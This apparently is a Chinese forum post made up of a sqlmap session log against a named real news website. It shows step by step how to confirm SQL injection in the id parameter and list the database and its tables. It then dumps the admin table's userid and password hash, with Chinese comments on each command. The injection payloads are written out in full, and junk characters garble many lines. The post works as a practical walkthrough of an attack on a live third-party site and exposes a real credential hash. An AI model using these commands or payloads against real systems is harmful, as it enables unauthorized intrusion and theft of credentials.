D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db4 k$ i8 o4 V0 d G9 z# ^, l1 z
ms "Mysql" --current-user /* 注解:获取当前用户名称
0 y8 }. S7 o. W& Q$ K. G2 L& U sqlmap/0.9 - automatic SQL injection and database takeover tool
6 x+ |- `% D! r9 y6 a0 P http://sqlmap.sourceforge.net starting at: 16:53:54: O7 @) m e t5 } f v- } A
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as' \9 e( W. x- g N+ Q" I; q
session file. { c) s6 m4 v
[16:53:54] [INFO] resuming injection data from session file
+ e% |" M; b2 i% s[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file1 M- A* ]4 D$ b
[16:53:54] [INFO] testing connection to the target url
+ @7 ?5 r2 h% o' Msqlmap identified the following injection points with a total of 0 HTTP(s) reque$ `: b w3 x. H2 s1 B+ { |
sts:
* j# @) Q7 M9 I' G- p7 e---5 W5 F/ W4 h! Z/ l
Place: GET; u4 @* }& L/ Z
Parameter: id
/ y& G2 o/ E4 N# R: w6 p L; x0 R( K Type: boolean-based blind
& [" E4 P- I4 i- m" [ Title: AND boolean-based blind - WHERE or HAVING clause5 m& t( X6 Q0 v$ \4 N1 d+ V3 \
Payload: id=276 AND 799=799
* L2 |+ y+ X+ @ Type: error-based7 @8 `( B" e0 H! P$ C
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
$ }3 V# s7 e! i$ v b5 s9 a9 R# [3 U Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
& l2 P6 J* \8 k5 w' U) A! T120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
* p5 u% K# \9 U& t# z. D, S- ~7 ~),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a). t4 D- ~6 y) g" M# e' Y5 [$ q
Type: UNION query
; A4 I) t2 U! |8 [* L Title: MySQL UNION query (NULL) - 1 to 10 columns
( y5 e9 v! C9 m; [7 q Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR0 Q% ]0 A$ Y: x4 R: z
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),) z! Z' K0 E& G) e) n0 }5 e* Z
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
$ C7 c2 ^+ G7 P# g Type: AND/OR time-based blind
1 j$ y" D. d$ u4 ` ?9 j; Y5 D Title: MySQL > 5.0.11 AND time-based blind
) m7 R2 }' I) E' K Payload: id=276 AND SLEEP(5)
. a1 B1 t2 C) C3 R3 R---1 M+ ]8 C, a7 c* K
[16:53:55] [INFO] the back-end DBMS is MySQL L9 l# O% f+ x4 C. ]
web server operating system: Windows9 Q$ u8 k- V- t l( d4 H
web application technology: Apache 2.2.11, PHP 5.3.0
, J, P' H& q4 W5 x, `, n" dback-end DBMS: MySQL 5.0
, k9 I# W: [1 Q9 _ w, b8 z: X2 q[16:53:55] [INFO] fetching current user
8 Q0 ^, @- W: p) r1 rcurrent user: 'root@localhost' ( q$ ?2 X% \7 Y
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou) }5 I5 N$ J7 s/ N; o6 U5 }$ I
tput\www.wepost.com.hk' shutting down at: 16:53:58& P, i5 \& N6 _$ ^5 s
/ }& G, E( @6 o, P% a$ p+ H
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db/ W% g% Y2 V7 h# ]
ms "Mysql" --current-db /*当前数据库5 \$ s) M E8 ^. [% c, K
sqlmap/0.9 - automatic SQL injection and database takeover tool
+ f$ r$ M+ {! x* D" @ http://sqlmap.sourceforge.net starting at: 16:54:16
4 Q3 Z2 y# Q; x/ }# w[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as( A; v$ o1 V& |5 Z I
session file; z7 v% ]! m! I; L4 z1 Z
[16:54:16] [INFO] resuming injection data from session file
R' `. y2 o! N1 @: |, o1 M[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file8 N5 H# ~9 H) L1 M
[16:54:16] [INFO] testing connection to the target url
k- R' |* @, ?# A- o& n: psqlmap identified the following injection points with a total of 0 HTTP(s) reque
1 T0 Y2 m5 @. q) w# Vsts:
3 _; t& f. f% |---
M/ G0 @8 g- x! w$ w. S; ?Place: GET
1 c+ G* ]6 y' J( b2 GParameter: id
/ d: @, j5 B- W Type: boolean-based blind
0 ^) Q- k5 E- N! _/ t Title: AND boolean-based blind - WHERE or HAVING clause
# E& c: Y4 C1 F4 t, V$ F Payload: id=276 AND 799=799; I$ q. ~- O1 D* A& l" w4 f3 l
Type: error-based, U4 o) L8 I$ B( q: {
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
e$ `) W9 x3 D1 G Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,$ x' A: \5 |% y: a& g/ k
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
# f( d( A/ e' S) E: c/ F),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
B5 I. q6 T: @! X Type: UNION query
+ {2 i$ e6 n, l( ~8 a# l Title: MySQL UNION query (NULL) - 1 to 10 columns' l- `) s6 h7 E+ T* ]6 G. D9 K
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
, {8 _3 I6 n" w(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),4 w+ J$ P5 M+ I% W% J# @( C
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#8 ?' f1 K, a4 `4 y* R# ^5 J
Type: AND/OR time-based blind& W0 H/ n7 m8 x. v3 b
Title: MySQL > 5.0.11 AND time-based blind
: E" x6 ~! w! \0 {% O) Z% g; s Payload: id=276 AND SLEEP(5)0 T- Q% z# L' J+ N
---
0 O3 W- `1 d0 o1 m[16:54:17] [INFO] the back-end DBMS is MySQL7 A7 X' K# I5 m/ s
web server operating system: Windows$ D5 j: ~1 {2 A7 ?- H0 K
web application technology: Apache 2.2.11, PHP 5.3.0
. z% o& H1 D6 U6 g' [back-end DBMS: MySQL 5.04 x( I' z& j4 q9 ?1 w7 H& ?% p
[16:54:17] [INFO] fetching current database$ w. |. ^3 B8 k
current database: 'wepost'
6 ]5 ^0 ]1 o4 V+ c# ~1 ^' k4 B[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou {* D4 O _" A4 V" {# u: t
tput\www.wepost.com.hk' shutting down at: 16:54:18! l0 }. q+ ^& g2 e( }
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
5 a% m/ m# o; S* R8 d3 `4 ^$ r, Oms "Mysql" --tables -D "wepost" /*获取当前数据库的表名/ M0 b N3 y" E4 V* f y
sqlmap/0.9 - automatic SQL injection and database takeover tool- h0 D/ g' S( `( k( j5 }! x4 S
http://sqlmap.sourceforge.net starting at: 16:55:25
4 J! a9 o& k2 X4 u2 i, |. E[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
- f% O$ }2 I$ {0 f! ^ session file
, w) z0 Q# ], [: m, d[16:55:25] [INFO] resuming injection data from session file* u& V7 M' @( @$ n" i% I7 W+ C
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
9 R) Y1 ]/ N \[16:55:25] [INFO] testing connection to the target url6 v( {7 A2 f( Z2 O1 q* P, W7 h
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
% E3 n) N2 G0 H* \5 w! ^) H L3 Dsts:
# i6 ?% }0 }4 D' n+ x---) s' ^6 L8 p& n
Place: GET
" t* S7 t" L1 z6 f( g1 EParameter: id9 C( k6 Z$ \( B0 S% h7 L
Type: boolean-based blind+ L& e8 J; w& g) W( Z+ N8 _- L% M
Title: AND boolean-based blind - WHERE or HAVING clause2 f7 Z3 G; ^2 R; V- \
Payload: id=276 AND 799=799$ r( F/ W+ D0 \/ w+ f+ O
Type: error-based4 G$ w3 w! Q+ O; T8 C
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
3 D. h, I" J P( b' }# M* i5 \- Q Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
6 n% y3 J, k- k: A' Y/ V/ Y- ?120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
/ P4 p' R; R } C9 j: Q; @# M% p),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
/ ~$ x( D; l( c3 W. F* U Type: UNION query% p! o' p3 W/ M Y/ R3 W) B) l2 k# O
Title: MySQL UNION query (NULL) - 1 to 10 columns
0 y n+ ?2 {2 N Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
( N+ F, U) ^* R; \8 q h$ Z(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
0 n( P5 W. v9 g: ]CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#) r) K a( s, s9 S; R W) f+ \
Type: AND/OR time-based blind
4 B4 c. t' s) q4 r& ] Title: MySQL > 5.0.11 AND time-based blind, P. z9 a6 C. R, A0 Q8 E! e; J2 o
Payload: id=276 AND SLEEP(5)8 ?( \" ?/ L* J% D& `5 G
---
+ o9 a8 s9 i5 G2 E[16:55:26] [INFO] the back-end DBMS is MySQL) }- S y# T# V1 H' m: `
web server operating system: Windows L0 ^" ^/ j/ w, |0 z0 N
web application technology: Apache 2.2.11, PHP 5.3.0
) l7 d6 u- [. `- O! ]3 Cback-end DBMS: MySQL 5.0
" j( M( ?2 l0 K) Z. _9 k# Z" c( V[16:55:26] [INFO] fetching tables for database 'wepost'
) k! }, w2 H. J' o! y- \, q" C6 D[16:55:27] [INFO] the SQL query used returns 6 entries0 Z! ~7 n0 i2 l! N _. s
Database: wepost
Y9 ~" u1 [" l0 G% s5 u[6 tables]8 n+ f# _5 n: L) q4 i
+-------------+
3 I: ?% V, ~# n' u# t| admin |6 G6 |$ M& S' A
| article |7 Y5 W' X$ t$ @0 g6 Y
| contributor |# w, L3 G) R3 @$ g
| idea |
! a9 V( G ` W: H9 z| image |. M, g G$ w: w
| issue |
# I8 H* |8 G7 o6 h3 a& a+-------------+
; A G, U4 x2 W7 L& B% |[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou' y- F9 w. o& h5 V6 n9 c* c
tput\www.wepost.com.hk' shutting down at: 16:55:33
7 h3 r# {9 f, J; T% d
& v3 X" D% S# r# {D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
: p5 l2 f# M* o7 i# p9 Ems "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
% U6 E2 w' n7 F# D/ j5 X$ c2 \8 m sqlmap/0.9 - automatic SQL injection and database takeover tool I! _4 _& P) ]* D$ l4 x
http://sqlmap.sourceforge.net starting at: 16:56:06
, Z# N5 [- \* T! Msqlmap identified the following injection points with a total of 0 HTTP(s) reque, ]7 z( i4 K, G! E E8 M
sts:! c8 {. i0 S& x* ?. a
---! @: A8 ?. I, J* E: x
Place: GET* m& L1 k) n( [
Parameter: id# Q) H( R: j8 u: j& ^* _8 `# n) u
Type: boolean-based blind( N7 p' L, j& g _' S P8 z5 |
Title: AND boolean-based blind - WHERE or HAVING clause
' R0 Y6 f* A9 q2 d# Q' _ Payload: id=276 AND 799=799
) L* p" q. j, { Type: error-based/ P& k, k: H5 V* }
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
2 I4 ]! R3 G1 p Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
' Z7 o7 |% l+ e120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58+ N4 F5 k& T. L/ G9 j
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
" X ~4 N7 X+ b Type: UNION query3 |" b8 ]. Z- r2 m
Title: MySQL UNION query (NULL) - 1 to 10 columns
' w$ q6 y4 L4 H+ Q) T9 Z( ] Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
4 z u, b% T! G! g G A" ~4 k! D/ j(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),1 p" y: m5 y( c
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
# \& I1 D9 c4 z Type: AND/OR time-based blind
0 G5 b8 `2 P4 X) e Title: MySQL > 5.0.11 AND time-based blind2 e; m! L% ?+ X) E
Payload: id=276 AND SLEEP(5)- K- s2 r: z+ P
---7 d( t- f, j- o9 ]* f* y
web server operating system: Windows
% F, t) b6 L$ D4 L9 {web application technology: Apache 2.2.11, PHP 5.3.0. y w, p! A6 K J
back-end DBMS: MySQL 5.0" A# {9 s/ `; k# I3 _; j, \
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
& o4 J* B' {# L+ E) kssion': wepost, wepost* H2 a& m, h9 G, P
Database: wepost& H9 m3 \. f C% M3 z* G
Table: admin
8 A4 u6 c; U9 I+ E& J+ D! q[4 columns]
/ X# b3 I2 F @8 j' d" ?) |, W+----------+-------------+7 k' A! h) q# p% B' o2 G( b
| Column | Type |3 n) T, @( @/ {7 g
+----------+-------------+- m* I. `+ |. c. c# s1 U. |
| id | int(11) |
$ K& ^: x) g9 a) i3 w z" t3 S| password | varchar(32) |! j% q3 b9 Q" g3 H5 l
| type | varchar(10) |
/ z! ]; k' L' y) B4 A, Q* W6 E| userid | varchar(20) |
4 }6 g" k& x6 L1 G4 T+----------+-------------+
* @. s7 u" h6 C5 K$ ]1 ~; L shutting down at: 16:56:19
! w4 P$ D% `- Y" g9 F, r5 a6 R5 }, J* R
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db _6 ~7 Z9 }- I! Z6 O
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容/ l( R- x8 n/ Y7 X6 u
sqlmap/0.9 - automatic SQL injection and database takeover tool
8 i) @$ l% Y: N! a0 q http://sqlmap.sourceforge.net starting at: 16:57:14/ u# |7 Z+ _( g0 B( a
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
6 M! T/ }8 ^ D8 P L8 ?sts:, h6 U1 a& V! ~" F
---
+ z/ f1 h. u9 ]# C9 l" z# NPlace: GET
7 d* u( A6 s1 u/ xParameter: id6 T& |/ Z& A4 z
Type: boolean-based blind
0 J& q" z0 ]' a" C! P% ]6 R+ e s Title: AND boolean-based blind - WHERE or HAVING clause7 G' m* ~ `* X; i- P3 T
Payload: id=276 AND 799=799' A E; Z$ p& F
Type: error-based3 V' E0 V& f. G9 k1 ^1 S
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause+ R$ M& ]1 F( D- J/ d3 r
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,4 a; S3 G3 M& c) u( o
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
& f" k6 u* c; X),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
" H! \4 \3 q6 R: D' J V Type: UNION query
1 V1 O5 b. d6 A' j" B Title: MySQL UNION query (NULL) - 1 to 10 columns x/ u' e) V4 V! T1 Q$ e4 W! H6 w
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR! W3 A# L& E' O) C3 e
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),- Y3 ^2 U" k" W% Z7 [6 h; [6 e0 \) ]
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
" ~9 {9 L/ v" m1 H3 c4 M: n8 Z Type: AND/OR time-based blind
9 n. T& o' e' M, W( T Title: MySQL > 5.0.11 AND time-based blind
- V; o* P, T, B# F* o Payload: id=276 AND SLEEP(5)9 ?4 e, r* l) l- D- i2 A: ]
---& i+ B; a* R4 y: @1 i7 D
web server operating system: Windows: e7 R( X; A, d1 [0 j
web application technology: Apache 2.2.11, PHP 5.3.0( s, E3 Z4 D( O
back-end DBMS: MySQL 5.07 ?: n0 i: q" |' d1 W" A L$ P9 d
recognized possible password hash values. do you want to use dictionary attack o
7 _& B7 z6 p1 p( A3 s# `/ r gn retrieved table items? [Y/n/q] y
; R4 Z' J7 B$ n2 y( }! fwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
! E' A$ h% C' q* s, [# k: sdo you want to use common password suffixes? (slow!) [y/N] y
8 J( x. d. @( y6 z+ G, `7 pDatabase: wepost
% {6 @2 C: T- V/ r5 f2 Q/ G: Y tTable: admin) x: Y1 g7 c- B8 Y
[1 entry]
1 F' i. t; {& k9 f) s* ], P+----------------------------------+------------+
, @0 U9 T6 i( N' L* U| password | userid |
1 Y/ d" Y3 I3 i) P7 ^) R, x1 s+----------------------------------+------------+
* `# @+ |) V( k| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 | T- C5 r1 w; H
+----------------------------------+------------+- q. v! _& q! B, N
shutting down at: 16:58:14
s3 g+ ]+ ~1 {
4 ^, E$ Y. V2 a J$ @D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对